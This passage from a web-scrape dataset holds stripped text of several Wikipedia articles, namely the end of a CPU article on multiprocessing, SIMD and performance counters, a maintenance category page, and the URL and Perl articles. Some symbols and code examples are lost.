technology is known as symmetric multiprocessing (SMP), where a small number of CPUs share a coherent view of their memory system. In this scheme, each CPU has additional hardware to maintain a constantly up-to-date view of memory. By avoiding stale views of memory, the CPUs can cooperate on the same program and programs can migrate from one CPU to another. To increase the number of cooperating CPUs beyond a handful, schemes such as non-uniform memory access (NUMA) and directory-based coherence protocols were introduced in the 1990s. SMP systems are limited to a small number of CPUs while NUMA systems have been built with thousands of processors. Initially, multiprocessing was built using multiple discrete CPUs and boards to implement the interconnect between the processors. When the processors and their interconnect are all implemented on a single chip, the technology is known as chip-level multiprocessing (CMP) and the single chip as a multi-core processor. It was later recognized that finer-grain parallelism existed with a single program. A single program might have several threads (or functions) that could be executed separately or in parallel. Some of the earliest examples of this technology implemented input output processing such as direct memory access as a separate thread from the computation thread. A more general approach to this technology was introduced in the 1970s when systems were designed to run multiple computation threads in parallel. This technology is known as multi-threading (MT). The approach is considered more cost-effective than multiprocessing, as only a small number of components within a CPU are replicated to support MT as opposed to the entire CPU in the case of MP. In MT, the execution units and the memory system including the caches are shared among multiple threads. The downside of MT is that the hardware support for multithreading is more visible to software than that of MP and thus supervisor software like operating systems have to undergo larger changes to support MT. One type of MT that was implemented is known as temporal multithreading, where one thread is executed until it is stalled waiting for data to return from external memory. In this scheme, the CPU would then quickly context switch to another thread which is ready to run, the switch often done in one CPU clock cycle, such as the UltraSPARC T1. Another type of MT is simultaneous multithreading, where instructions from multiple threads are executed in parallel within one CPU clock cycle. For several decades from the 1970s to early 2000s, the focus in designing high performance general purpose CPUs was largely on achieving high ILP through technologies such as pipelining, caches, superscalar execution, out-of-order execution, etc. This trend culminated in large, power-hungry CPUs such as the Intel Pentium 4. By the early 2000s, CPU designers were thwarted from achieving higher performance from ILP techniques due to the growing disparity between CPU operating frequencies and main memory operating frequencies as well as escalating CPU power dissipation owing to more esoteric ILP techniques. CPU designers then borrowed ideas from commercial computing markets such as transaction processing, where the aggregate performance of multiple programs, also known as throughput computing, was more important than the performance of a single thread or process. This reversal of emphasis is evidenced by the proliferation of dual and more core processor designs and notably, Intel's newer designs resembling its less superscalar P6 architecture. Late designs in several processor families exhibit CMP, including the x86 64 Opteron and Athlon 64 X2, the SPARC UltraSPARC T1, IBM POWER4 and POWER5, as well as several video game console CPUs like the Xbox 360's triple-core PowerPC design, and the PlayStation 3's 7 core Cell microprocessor. A less common but increasingly important paradigm of processors (and indeed, computing in general) deals with data parallelism. The processors discussed earlier are all referred to as some type of scalar device. j As the name implies, vector processors deal with multiple pieces of data in the context of one instruction. This contrasts with scalar processors, which deal with one piece of data for every instruction. Using Flynn's taxonomy, these two schemes of dealing with data are generally referred to as single instruction stream, multiple data stream (SIMD) and single instruction stream, single data stream (SISD), respectively. The great utility in creating processors that deal with vectors of data lies in optimizing tasks that tend to require the same operation (for example, a sum or a dot product) to be performed on a large set of data. Some classic examples of these types of tasks include multimedia applications (images, video and sound), as well as many types of scientific and engineering tasks. Whereas a scalar processor must complete the entire process of fetching, decoding and executing each instruction and value in a set of data, a vector processor can perform a single operation on a comparatively large set of data with one instruction. This is only possible when the application tends to require many steps which apply one operation to a large set of data. Most early vector processors, such as the Cray 1, were associated almost exclusively with scientific research and cryptography applications. However, as multimedia has largely shifted to digital media, the need for some form of SIMD in general-purpose processors has become significant. Shortly after inclusion of floating-point units started to become commonplace in general-purpose processors, specifications for and implementations of SIMD execution units also began to appear for general-purpose processors. when? Some of these early SIMD specifications like HP's Multimedia Acceleration eXtensions (MAX) and Intel's MMX were integer-only. This proved to be a significant impediment for some software developers, since many of the applications that benefit from SIMD primarily deal with floating-point numbers. Progressively, developers refined and remade these early designs into some of the common modern SIMD specifications, which are usually associated with one instruction set architecture (ISA). Some notable modern examples include Intel's Streaming SIMD Extensions (SSE) and the PowerPC-related AltiVec (also known as VMX). k Many modern architectures (including embedded ones) often include hardware performance counters (HPC), which enables low-level (instruction-level) collection, benchmarking, debugging or analysis of running software metrics. 81 82 HPC may also be used to discover and analyze unusual or suspicious activity of the software, such as return-oriented programming (ROP) or sigreturn-oriented programming (SROP) exploits etc. 83 This is usually done by software-security teams to assess and find malicious binary programs. 84 Many major vendors (such as IBM, Intel, AMD, and Arm) provide software interfaces (usually written in C C ) that can be used to collect data from the CPU's registers in order to get metrics. 85 Operating system vendors also provide software like perf (Linux) to record, benchmark, or trace CPU events running kernels and applications. Hardware counters provide a low-overhead method for collecting comprehensive performance metrics related to a CPU's core elements (functional units, caches, main memory, etc.) a significant advantage over software profilers. 86 Additionally, they generally eliminate the need to modify the underlying source code of a program. 87 88 Because hardware designs differ between architectures, the specific types and interpretations of hardware counters will also change. Most modern CPUs have privileged modes to support operating systems and virtualization. Cloud computing can use virtualization to provide virtual central processing units 89 (vCPUs) for separate users. 90 A host is the virtual equivalent of a physical machine, on which a virtual system is operating. 91 When there are several physical machines operating in tandem and managed as a whole, the grouped computing and memory resources form a cluster. In some systems, it is possible to dynamically add and remove from a cluster. Resources available at a host and cluster level can be partitioned into resources pools with fine granularity. The performance or speed of a processor depends on, among many other factors, the clock rate (generally given in multiples of hertz) and the instructions per clock (IPC), which together are the factors for the instructions per second (IPS) that the CPU can perform. 92 Many reported IPS values have represented "peak" execution rates on artificial instruction sequences with few branches, whereas realistic workloads consist of a mix of instructions and applications, some of which take longer to execute than others. The performance of the memory hierarchy also greatly affects processor performance, an issue barely considered in IPS calculations. Because of these problems, various standardized tests, often called "benchmarks" for this purpose — such as SPECint — have been developed to attempt to measure the real effective performance in commonly used applications. Processing performance of computers is increased by using multi-core processors, which essentially is plugging two or more individual processors (called cores in this sense) into one integrated circuit. 93 Ideally, a dual core processor would be nearly twice as powerful as a single core processor. In practice, the performance gain is far smaller, only about 50%, due to imperfect software algorithms and implementation. 94 Increasing the number of cores in a processor (i.e. dual-core, quad-core, etc.) increases the workload that can be handled. This means that the processor can now handle numerous asynchronous events, interrupts, etc. which can take a toll on the CPU when overwhelmed. These cores can be thought of as different floors in a processing plant, with each floor handling a different task. Sometimes, these cores will handle the same tasks as cores adjacent to them if a single core is not enough to handle the information. Multi-core CPUs enhance a computer's ability to run several tasks simultaneously by providing additional processing power. However, the increase in speed is not directly proportional to the number of cores added. This is because the cores need to interact through specific channels, and this inter-core communication consumes a portion of the available processing speed. 95 Due to specific capabilities of modern CPUs, such as simultaneous multithreading and uncore, which involve sharing of actual CPU resources while aiming at increased utilization, monitoring performance levels and hardware use gradually became a more complex task. 96 As a response, some CPUs implement additional hardware logic that monitors actual use of various parts of a CPU and provides various counters accessible to software; an example is Intel's Performance Counter Monitor technology. 9 |
180 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:All_articles_needing_additional_references | This category contains all pages labeled with Refimprove , Refimprovesect , One source and Unreferenced section and exists primarily for bot-based monitoring of articles which need additional sources. By-month categories are located in Category:Articles needing additional references. This category has the following 4 subcategories, out of 4 total. The following 200 pages are in this category, out of approximately 461,650 total. This list may not reflect recent changes. |
181 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/URL | A uniform resource locator (URL), colloquially known as an address on the Web, 1 is a reference to a resource that specifies its location on a computer network and a mechanism for retrieving it. A URL is a specific type of Uniform Resource Identifier (URI), 2 3 although many people use the two terms interchangeably. 4 a URLs occur most commonly to reference web pages (HTTP HTTPS) but are also used for file transfer (FTP), email (mailto), database access (JDBC), and many other applications. Most web browsers display the URL of a web page above the page in an address bar. A typical URL could have the form http: www.example.com index.html, which indicates a protocol (http), a hostname (www.example.com), and a file name (index.html). Uniform Resource Locators were defined in RFC 1738 in 1994 by Tim Berners-Lee, the inventor of the World Wide Web, and the URI working group of the Internet Engineering Task Force (IETF), 7 as an outcome of collaboration started at the IETF Living Documents birds of a feather session in 1992. 7 8 The format combines the pre-existing system of domain names (created in 1985) with file path syntax, where slashes are used to separate directory and filenames. Conventions already existed where server names could be prefixed to complete file paths, preceded by a double slash ( ). 9 Berners-Lee later expressed regret at the use of dots to separate the parts of the domain name within URIs, wishing he had used slashes throughout, 9 and also said that, given the colon following the first component of a URI, the two slashes before the domain name were unnecessary. 10 Early WorldWideWeb collaborators including Berners-Lee originally proposed the use of UDIs: Universal Document Identifiers. An early (1993) draft of the HTML Specification 11 referred to "Universal" Resource Locators. This was dropped some time between June 1994 (RFC 1630) and October 1994 (draft-ietf-uri-url 08.txt). 12 In his book Weaving the Web, Berners-Lee emphasizes his preference for the original inclusion of "universal" in the expansion rather than the word "uniform", to which it was later changed, and he gives a brief account of the contention that led to the change. Every HTTP URL conforms to the syntax of a generic URI. The URI generic syntax consists of five components organized hierarchically in order of decreasing significance from left to right: 13 : 3 A component is undefined if it has an associated delimiter and the delimiter does not appear in the URI; the scheme and path components are always defined. 13 : 5.2.1 A component is empty if it has no characters; the scheme component is always non-empty. 13 : 3 The authority component consists of subcomponents: This is represented in a syntax diagram as: The URI comprises: A web browser will usually dereference a URL by performing an HTTP request to the specified host, by default on port number 80. URLs using the https scheme require that requests and responses be made over a secure connection to the website. Internet users are distributed throughout the world using a wide variety of languages and alphabets, and expect to be able to create URLs in their own local alphabets. An Internationalized Resource Identifier (IRI) is a form of URL that includes Unicode characters. All modern browsers support IRIs. The parts of the URL requiring special treatment for different alphabets are the domain name and path. 18 19 The domain name in the IRI is known as an Internationalized Domain Name (IDN). Web and Internet software automatically convert the domain name into punycode usable by the Domain Name System; for example, the Chinese URL http: . becomes http: xn fsqu00a.xn 3lr804guic . The xn indicates that the character was not originally ASCII. 20 The URL path name can also be specified by the user in the local writing system. If not already encoded, it is converted to UTF 8, and any characters not part of the basic URL character set are escaped as hexadecimal using percent-encoding; for example, the Japanese URL http: example.com .html becomes http: example.com E5%BC 95%E3%81%8D E5%89%B2%E3%82%8A.html. The target computer decodes the address and displays the page. 18 Protocol-relative links (PRL), also known as protocol-relative URLs (PRURL), are URLs that have no protocol specified. For example, example.com will use the protocol of the current page, typically HTTP or HTTPS. 21 22 |
182 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Perl | Perl is a high-level, general-purpose, interpreted, dynamic programming language. Though Perl is not officially an acronym, 9 there are various backronyms in use, including "Practical Extraction and Reporting Language". 10 Perl was developed by Larry Wall in 1987 11 as a general-purpose Unix scripting language to make report processing easier. 12 11 13 Since then, it has undergone many changes and revisions. Perl originally was not capitalized and the name was changed to being capitalized by the time Perl 4 was released. 13 The latest release is Perl 5, first released in 1994. From 2000 to October 2019 a sixth version of Perl was in development; the sixth version's name was changed to Raku. 14 15 Both languages continue to be developed independently by different development teams which liberally borrow ideas from each other. Perl borrows features from other programming languages including C, sh, AWK, and sed. 1 It provides text processing facilities without the arbitrary data-length limits of many contemporary Unix command line tools. 16 Perl is a highly expressive programming language: source code for a given algorithm can be short and highly compressible. 17 18 Perl gained widespread popularity in the mid 1990s as a CGI scripting language, in part due to its powerful regular expression and string parsing abilities. 19 20 21 22 In addition to CGI, Perl 5 is used for system administration, network programming, finance, bioinformatics, and other applications, such as for graphical user interfaces (GUIs). It has been nicknamed "the Swiss Army chainsaw of scripting languages" because of its flexibility and power. 23 In 1998, it was also referred to as the "duct tape that holds the Internet together", in reference to both its ubiquitous use as a glue language and its perceived inelegance. 24 Perl was originally named "Pearl". Wall wanted to give the language a short name with positive connotations. It is also a Christian reference to the Parable of the Pearl from the Gospel of Matthew. 11 25 However, Wall discovered the existing PEARL language before Perl's official release and changed the spelling of the name and dropped the "a" from the name. 26 11 The name is occasionally expanded as a backronym: Practical Extraction and Report Language 27 and Wall's own Pathologically Eclectic Rubbish Lister, which is in the manual page for perl. 28 Programming Perl, published by O'Reilly Media, features a picture of a dromedary camel on the cover and is commonly called the "Camel Book". 29 This image has become an unofficial symbol of Perl. O'Reilly owns the image as a trademark but licenses it for non-commercial use, requiring only an acknowledgement and a link to www.perl.com. Licensing for commercial use is decided on a case-by-case basis. 30 O'Reilly also provides "Programming Republic of Perl" logos for non-commercial sites and "Powered by Perl" buttons for any site that uses Perl. 30 The Perl Foundation owns an alternative symbol, an onion, which it licenses to its subsidiaries, Perl Mongers, PerlMonks, Perl.org, and others. 31 The symbol is a visual pun on pearl onion. 32 Larry Wall began work on Perl in 1987, while employed as a programmer at Unisys; 16 he released version 1.0 on December 18, 1987. 1 11 Wall based early Perl on some methods existing languages used for text manipulation. 11 Perl 2, released in June 1988, 33 34 featured a better regular expression engine. Perl 3, released in October 1989, 33 added support for binary data streams. 35 Originally, the only documentation for Perl was a single lengthy man page. In 1991, Programming Perl, known to many Perl programmers as the "Camel Book" because of its cover, was published and became the de facto reference for the language. 36 At the same time, the Perl version number was bumped to 4, not to mark a major change in the language but to identify the version that was well documented by the book. 37 Perl 4 was released in March 1991. 33 Perl 4 went through a series of maintenance releases, culminating in Perl 4.036 in 1993, whereupon Wall abandoned Perl 4 to begin work on Perl 5. Initial design of Perl 5 continued into 1994. The perl5 porters mailing list was established in May 1994 to coordinate work on porting Perl 5 to different platforms. It remains the primary forum for development, maintenance, and porting of Perl 5. 38 Perl 5.000 was released on October 17, 1994. 39 It was a nearly complete rewrite of the interpreter, and it added many new features to the language, including objects, references, lexical (my) variables, and modules. Importantly, modules provided a mechanism for extending the language without modifying the interpreter. This allowed the core interpreter to stabilize, even as it enabled ordinary Perl programmers to add new language features. Perl 5 has been in active development since then. Perl 5.001 was released on March 13, 1995. Perl 5.002 was released on February 29, 1996 with the new prototypes feature. This allowed module authors to make subroutines that behaved like Perl builtins. Perl 5.003 was released June 25, 1996, as a security release. 40 One of the most important events in Perl 5 history took place outside of the language proper and was a consequence of its module support. On October 26, 1995, the Comprehensive Perl Archive Network (CPAN) was established as a repository for the Perl language and Perl modules; as of December 2022 update , it carries over 211,850 modules in 43,865 distributions, written by more than 14,324 authors, and is mirrored worldwide at more than 245 locations. 41 Perl 5.004 was released on May 15, 1997, and included, among other things, the UNIVERSAL package, giving Perl a base object from which all classes were automatically derived and the ability to require versions of modules. Another significant development was the inclusion of the CGI.pm module, 42 which contributed to Perl's popularity as a CGI scripting language. 43 Perl 5.004 added support for Microsoft Windows, Plan 9, QNX, and AmigaOS. 42 Perl 5.005 was released on July 22, 1998. This release included several enhancements to the regex engine, new hooks into the backend through the B:: modules, the qr regex quote operator, a large selection of other new core modules, and added support for several more operating systems, including BeOS. 44 Perl 5.6 was released on March 22, 2000. Major changes included 64 bit support, Unicode string representation, support for files over 2 GiB, and the "our" keyword. 46 47 When developing Perl 5.6, the decision was made to switch the versioning scheme to one more similar to other open source projects; after 5.005 63, the next version became 5.5.640, with plans for development versions to have odd numbers and stable versions to have even numbers. 48 In 2000, Wall put forth a call for suggestions for a new version of Perl from the community. The process resulted in 361 RFC (Request for Comments) documents that were to be used in guiding development of Perl 6. In 2001, 49 work began on the "Apocalypses" for Perl 6, a series of documents meant to summarize the change requests and present the design of the next generation of Perl. They were presented as a digest of the RFCs, rather than a formal document. At this time, Perl 6 existed only as a description of a language. citation needed Perl 5.8 was first released on July 18, 2002, and further 5.X versions have been released approximately yearly since then. Perl 5.8 improved Unicode support, added a new I O implementation, added a new thread implementation, improved numeric accuracy, and added several new modules. 50 As of 2013, this version was still the most popular Perl version and was used by Red Hat Linux 5, SUSE Linux 10, Solaris 10, HP-UX 11.31, and AIX 5. In 2004, work began on the "Synopses" documents that originally summarized the Apocalypses, but which became the specification for the Perl 6 language. In February 2005, Audrey Tang began work on Pugs, a Perl 6 interpreter written in Haskell. 51 This was the first concerted effort toward making Perl 6 a reality. This effort stalled in 2006. 52 The Perl On New Internal Engine (PONIE) project existed from 2003 until 2006. It was to be a bridge between Perl 5 and 6, and an effort to rewrite the Perl 5 interpreter to run on the Perl 6 Parrot virtual machine. The goal was to ensure the future of the millions of lines of Perl 5 code at thousands of companies around the world. 53 The PONIE project ended in 2006 and is no longer being actively developed. Some of the improvements made to the Perl 5 interpreter as part of PONIE were folded into that project. 54 On December 18, 2007, the 20th anniversary of Perl 1.0, Perl 5.10.0 was released. Perl 5.10.0 included notable new features, which brought it closer to Perl 6. These included a switch statement (called "given" "when"), regular expressions updates, and the smart match operator ( ). 55 56 Around this same time, development began in earnest on another implementation of Perl 6 known as Rakudo Perl, developed in tandem with the Parrot virtual machine. As of November 2009, Rakudo Perl has had regular monthly releases and now is the most complete implementation of Perl 6. A major change in the development process of Perl 5 occurred with Perl 5.11; the development community has switched to a monthly release cycle of development releases, with a yearly schedule of stable releases. By that plan, bugfix point releases will follow the stable releases every three months. citation needed On April 12, 2010, Perl 5.12.0 was released. Notable core enhancements include new package NAME VERSION syntax, the yada yada operator (intended to mark placeholder code that is not yet implemented), implicit strictures, full Y2038 compliance, regex conversion overloading, DTrace support, and Unicode 5.2. 57 On May 14, 2011, Perl 5.14 was released with JSON support built-in. 58 On May 20, 2012, Perl 5.16 was released. Notable new features include the ability to specify a given version of Perl that one wishes to emulate, allowing users to upgrade their version of Perl, but still run old scripts that would normally be incompatible. 59 failed verification Perl 5.16 also updates the core to support Unicode 6.1. 59 On May 18, 2013, Perl 5.18 was released. Notable new features include the new dtrace hooks, lexical subs, more CORE:: subs, overhaul of the hash for security reasons, support for Unicode 6.2. 60 On May 27, 2014, Perl 5.20 was released. Notable new features include subroutine signatures, hash slices new slice syntax, postfix dereferencing (experimental), Unicode 6.3, and a rand() function using a consistent random number generator. 61 Some observers credit the release of Perl 5.10 with the start of the Modern Perl movement. 62 In particular, this phrase describes a style of development that embraces the use of the CPAN, takes advantage of recent developments in the language, and is rigorous about creating high quality code. 63 While the book Modern Perl 64 may be the most visible standard-bearer of this idea, other groups such as the Enlightened Perl Organization 65 have taken up the cause. In late 2012 and 2013, several projects for alternative implementations for Perl 5 started: Perl5 in Perl6 by the Rakudo Perl team, 66 moe by Stevan Little and friends, 67 p2 68 by the Perl11 team under Reini Urban, gperl by goccy, 69 and rperl, a Kickstarter project led by Will Braswell and affiliated with the Perl11 project. 70 At the 2000 Perl Conference, Jon Orwant made a case for a major new language initiative. 72 This led to a decision to begin work on a redesign of the language, to be called Perl 6. Proposals for new language features were solicited from the Perl community at large, which submitted more than 300 RFCs. 73 Wall spent the next few years digesting the RFCs and synthesizing them into a coherent framework for Perl 6. He presented his design for Perl 6 in a series of documents called "apocalypses" numbered to correspond to chapters in Programming Perl. As of January 2011 update , the developing specification of Perl 6 was encapsulated in design documents called Synopses numbered to correspond to Apocalypses. 74 Thesis work by Bradley M. Kuhn, overseen by Wall, considered the possible use of the Java virtual machine as a runtime for Perl. 75 Kuhn's thesis showed this approach to be problematic. In 2001, it was decided that Perl 6 would run on a cross-language virtual machine called Parrot. In 2005, Audrey Tang created the Pugs project, an implementation of Perl 6 in Haskell. This acted as, and continues to act as, a test platform for the Perl 6 language (separate from the development of the actual implementation), allowing the language designers to explore. The Pugs project spawned an active Perl Haskell cross-language community centered around the Libera Chat raku IRC channel. Many functional programming influences were absorbed by the Perl 6 design team. 76 In 2012, Perl 6 development was centered primarily on two compilers: 77 In 2013, MoarVM ("Metamodel On A Runtime"), a C language-based virtual machine designed primarily for Rakudo was announced. 79 In October 2019, Perl 6 was renamed to Raku. 80 As of 2017 update only the Rakudo implementation and MoarVM are under active development, and other virtual machines, such as the Java Virtual Machine and JavaScript, are supported. 81 In June 2020, Perl 7 was announced as the successor to Perl 5. 82 Perl 7 was to initially be based on Perl 5.32 with a release expected in first half of 2021, and release candidates sooner. 83 This plan was revised in May 2021, without any release timeframe or version of Perl 5 for use as a baseline specified. 84 When Perl 7 would be released, Perl 5 would have gone into long term maintenance. Supported Perl 5 versions however would continue to get important security and bug fixes. 85 Perl 7 was announced on 24 June 2020 at "The Perl Conference in the Cloud" as the successor to Perl 5. 83 82 Based on Perl 5.32, Perl 7 was planned to be backward compatible with modern Perl 5 code; Perl 5 code, without boilerplate (pragma) header needs adding use compat::perl5; to stay compatible, but modern code can drop some of the boilerplate. The plan to go to Perl 7 brought up more discussion, however, and the Perl Steering Committee canceled it to avoid issues with backward compatibility for scripts that were not written to the pragmas and modules that would become the default in Perl 7. Perl 7 will only come out when the developers add enough features to warrant a major release upgrade. 86 According to Wall, Perl has two slogans. The first is "There's more than one way to do it, commonly known as TMTOWTDI, (pronounced Tim Toady). As proponents of this motto argue, this philosophy makes it easy to write concise statements. 87 88 89 The second slogan is "Easy things should be easy and hard things should be possible". 16 The design of Perl can be understood as a response to three broad trends in the computer industry: falling hardware costs, rising labor costs, and improvements in compiler technology. Many earlier computer languages, such as Fortran and C, aimed to make efficient use of expensive computer hardware. In contrast, Perl was designed so that computer programmers could write programs more quickly and easily. 90 Perl has many features that ease the task of the programmer at the expense of greater CPU and memory requirements. These include automatic memory management; dynamic typing; strings, lists, and hashes; regular expressions; introspection; and an eval() function. Perl follows the theory of "no built-in limits", 29 an idea similar to the Zero One Infinity rule. Wall was trained as a linguist, and the design of Perl is very much informed by linguistic principles. Examples include Huffman coding (common constructions should be short), good end-weighting (the important information should come first), and a large collection of language primitives. Perl favors language constructs that are concise and natural for humans to write, even where they complicate the Perl interpreter. 91 Perl's syntax reflects the idea that "things that are different should look different. 92 For example, scalars, arrays, and hashes have different leading sigils. Array indices and hash keys use different kinds of braces. Strings and regular expressions have different standard delimiters. There is a broad practical bent to both the Perl language and the community and culture that surround it. The preface to Programming Perl begins: "Perl is a language for getting your job done. 16 One consequence of this is that Perl is not a tidy language. It includes many features, tolerates exceptions to its rules, and employs heuristics to resolve syntactical ambiguities. Because of the forgiving nature of the compiler, bugs can sometimes be hard to find. Perl's function documentation remarks on the variant behavior of built-in functions in list and scalar contexts by saying, "In general, they do what you want, unless you want consistency. 93 The overall structure of Perl derives broadly from C. Perl is procedural in nature, with variables, expressions, assignment statements, brace-delimited blocks, control structures, and subroutines. 94 Perl also takes features from shell programming. All variables are marked with leading sigils, which allow variables to be interpolated directly into strings. However, unlike the shell, Perl uses sigils on all accesses to variables, and unlike most other programming languages that use sigils, the sigil doesn't denote the type of the variable but the type of the expression. So for example, while an array is denoted by the sigil (for example arrayname), an individual member of the array is denoted by the scalar sigil (for example arrayname 3 ). Perl also has many built-in functions that provide tools often used in shell programming (although many of these tools are implemented by programs external to the shell) such as sorting, and calling operating system facilities. citation needed Perl takes hashes ("associative arrays") from AWK and regular expressions from sed. These simplify many parsing, text-handling, and data-management tasks. Shared with Lisp is the implicit return of the last value in a block, and all statements are also expressions which can be used in larger expressions themselves. citation needed Perl 5 added features that support complex data structures, first-class functions (that is, closures as values), and an object-oriented programming model. These include references, packages, class-based method dispatch, and lexically scoped variables, along with compiler directives (for example, the strict pragma). A major additional feature introduced with Perl 5 was the ability to package code as reusable modules. Wall later stated that "The whole intent of Perl 5's module system was to encourage the growth of Perl culture rather than the Perl core. 95 All versions of Perl do automatic data-typing and automatic memory management. The interpreter knows the type and storage requirements of every data object in the program; it allocates and frees storage for them as necessary using reference counting (so it cannot deallocate circular data structures without manual intervention). Legal type conversions for example, conversions from number to string are done automatically at run time; illegal type conversions are fatal errors. citation needed Perl has been referred to as "line noise" and a "write-only language" by its critics. Randal L. Schwartz in the first edition of the book Learning Perl, 96 in the first chapter states: "Yes, sometimes Perl looks like line noise to the uninitiated, but to the seasoned Perl programmer, it looks like checksummed line noise with a mission in life. 97 He also stated that the accusation that Perl is a write-only language could be avoided by coding with "proper care". 97 The Perl overview document perlintro states that the names of built-in "magic" scalar variables "look like punctuation or line noise". 98 However, the English module provides both long and short English alternatives. perlstyle document states that line noise in regular expressions could be mitigated using the x modifier to add whitespace. 99 According to the Perl 6 FAQ, Perl 6 was designed to mitigate "the usual suspects" that elicit the "line noise" claim from Perl 5 critics, including the removal of "the majority of the punctuation variables" and the sanitization of the regex syntax. 100 The Perl 6 FAQ also states that what is sometimes referred to as Perl's line noise is "the actual syntax of the language" just as gerunds and prepositions are a part of the English language. 100 In a December 2012 blog posting, despite claiming that "Rakudo Perl 6 has failed and will continue to fail unless it gets some adult supervision", chromatic stated that the design of Perl 6 has a "well-defined grammar", an "improved type system, a unified object system with an intelligent metamodel, metaoperators, and a clearer system of context that provides for such niceties as pervasive laziness". 101 He also stated that "Perl 6 has a coherence and a consistency that Perl 5 lacks. 101 In Perl, one could write the "Hello, World program as: Here is a more complex Perl program, that counts down seconds from a given starting value: The Perl interpreter can also be used for one-off scripts on the command line. The following example (as invoked from an sh-compatible shell, such as Bash) translates the string "Bob" in all files ending with .txt in the current directory to "Robert": No written specification or standard for the Perl language exists for Perl versions through Perl 5, and there are no plans to create one for the current version of Perl. There has been only one implementation of the interpreter, and the language has evolved along with it. That interpreter, together with its functional tests, stands as a de facto specification of the language. Perl 6, however, started with a specification, 102 and several projects 103 aim to implement some or all of the specification. citation needed Perl is implemented as a core interpreter, written in C, together with a large collection of modules, written in Perl and C. As of 2010 update , the interpreter is 150,000 lines of C code and compiles to a 1 MB executable on typical machine architectures. Alternatively, the interpreter can be compiled to a link library and embedded in other programs. There are nearly 500 modules in the distribution, comprising 200,000 lines of Perl and an additional 350,000 lines of C code (much of the C code in the modules consists of character encoding tables). citation needed The interpreter has an object-oriented architecture. All of the elements of the Perl language—scalars, arrays, hashes, coderefs, file handles—are represented in the interpreter by C structs. Operations on these structs are defined by a large collection of macros, typedefs, and functions; these constitute the Perl C API. The Perl API can be bewildering to the uninitiated, but its entry points follow a consistent naming scheme, which provides guidance to those who use it. citation needed The life of a Perl interpreter divides broadly into a compile phase and a run phase. 104 In Perl, the phases are the major stages in the interpreter's life-cycle. Each interpreter goes through each phase only once, and the phases follow in a fixed sequence. citation needed Most of what happens in Perl's compile phase is compilation, and most of what happens in Perl's run phase is execution, but there are significant exceptions. Perl makes important use of its capability to execute Perl code during the compile phase. Perl will also delay compilation into the run phase. The terms that indicate the kind of processing that is actually occurring at any moment are compile time and run time. Perl is in compile time at most points during the compile phase, but compile time may also be entered during the run phase. The compile time for code in a string argument passed to the eval built-in occurs during the run phase. Perl is often in run time during the compile phase and spends most of the run phase in run time. Code in BEGIN blocks executes at run time but in the compile phase. At compile time, the interpreter parses Perl code into a syntax tree. At run time, it executes the program by walking the tree. Text is parsed only once, and the syntax tree is subject to optimization before it is executed, so that execution is relatively efficient. Compile-time optimizations on the syntax tree include constant folding and context propagation, but peephole optimization is also performed. 105 Perl has a Turing-complete grammar because parsing can be affected by run-time code executed during the compile phase. 106 Therefore, Perl cannot be parsed by a straight Lex Yacc lexer parser combination. Instead, the interpreter implements its own lexer, which coordinates with a modified GNU bison parser to resolve ambiguities in the language. citation needed It is often said that "Only perl can parse Perl", 107 meaning that only the Perl interpreter (perl) can parse the Perl language (Perl), but even this is not, in general, true. Because the Perl interpreter can simulate a Turing machine during its compile phase, it would need to decide the halting problem in order to complete parsing in every case. It is a longstanding result that the halting problem is undecidable, and therefore not even Perl can always parse Perl. Perl makes the unusual choice of giving the user access to its full programming power in its own compile phase. The cost in terms of theoretical purity is high, but practical inconvenience seems to be rare. 108 Other programs that undertake to parse Perl, such as source-code analyzers and auto-indenters, have to contend not only with ambiguous syntactic constructs but also with the undecidability of Perl parsing in the general case. Adam Kennedy's PPI project focused on parsing Perl code as a document (retaining its integrity as a document), instead of parsing Perl as executable code (that not even Perl itself can always do). It was Kennedy who first conjectured that "parsing Perl suffers from the 'halting problem', 109 which was later proved. 110 Perl is distributed with over 250,000 functional tests for core Perl language and over 250,000 functional tests for core modules. These run as part of the normal build process and extensively exercise the interpreter and its core modules. Perl developers rely on the functional tests to ensure that changes to the interpreter do not introduce software bugs; further, Perl users who see that the interpreter passes its functional tests on their system can have a high degree of confidence that it is working properly. citation needed Perl is dual licensed under both the Artistic License 1.0 5 6 and the GNU General Public License. 7 Distributions are available for most operating systems. It is particularly prevalent on Unix and Unix-like systems, but it has been ported to most modern (and many obsolete) platforms. With only six citation needed reported exceptions, Perl can be compiled from source code on all POSIX-compliant, or otherwise-Unix-compatible, platforms. 111 Because of unusual changes required for the classic Mac OS environment, a special port called MacPerl was shipped independently. 112 The Comprehensive Perl Archive Network carries a complete list of supported platforms with links to the distributions available on each. 113 CPAN is also the source for publicly available Perl modules that are not part of the core Perl distribution. citation needed ActivePerl is a closed-source distribution from ActiveState that has regular releases that track the core Perl releases. 114 The distribution previously included the Perl package manager (PPM), 115 a popular tool for installing, removing, upgrading, and managing the use of common Perl modules; however, this tool was discontinued as of ActivePerl 5.28. 116 Included also is PerlScript, a Windows Script Host (WSH) engine implementing the Perl language. Visual Perl is an ActiveState tool that adds Perl to the Visual Studio .NET development suite. A VBScript-to-Perl converter, a Perl compiler for Windows, and converters of AWK and sed to Perl have also been produced by this company and included on the ActiveState CD for Windows, which includes all of their distributions plus the Komodo IDE and all but the first on the Unix Linux POSIX variant thereof in 2002 and afterward. 117 The Computer Language Benchmarks Game compares the performance of implementations of typical programming problems in several programming languages. 118 The submitted Perl implementations typically perform toward the high end of the memory-usage spectrum and give varied speed results. Perl's performance in the benchmarks game is typical for interpreted languages. 119 Large Perl programs start more slowly than similar programs in compiled languages because Perl has to compile the source every time it runs. In a talk at the YAPC::Europe 2005 conference and subsequent article "A Timely Start", Jean-Louis Leroy found that his Perl programs took much longer to run than expected because the perl interpreter spent significant time finding modules within his over-large include path. 120 Unlike Java, Python, and Ruby, Perl has only experimental support for pre-compiling. 121 Therefore, Perl programs pay this overhead penalty on every execution. The run phase of typical programs is long enough that amortized startup time is not substantial, but benchmarks that measure very short execution times are likely to be skewed due to this overhead. 122 A number of tools have been introduced to improve this situation. The first such tool was Apache's mod perl, which sought to address one of the most-common reasons that small Perl programs were invoked rapidly: CGI Web development. ActivePerl, via Microsoft ISAPI, provides similar performance improvements. 123 Once Perl code is compiled, there is additional overhead during the execution phase that typically isn't present for programs written in compiled languages such as C or C . Examples of such overhead include bytecode interpretation, reference-counting memory management, and dynamic type-checking. 124 The most critical routines can be written in other languages (such as C), which can be connected to Perl via simple Inline modules or 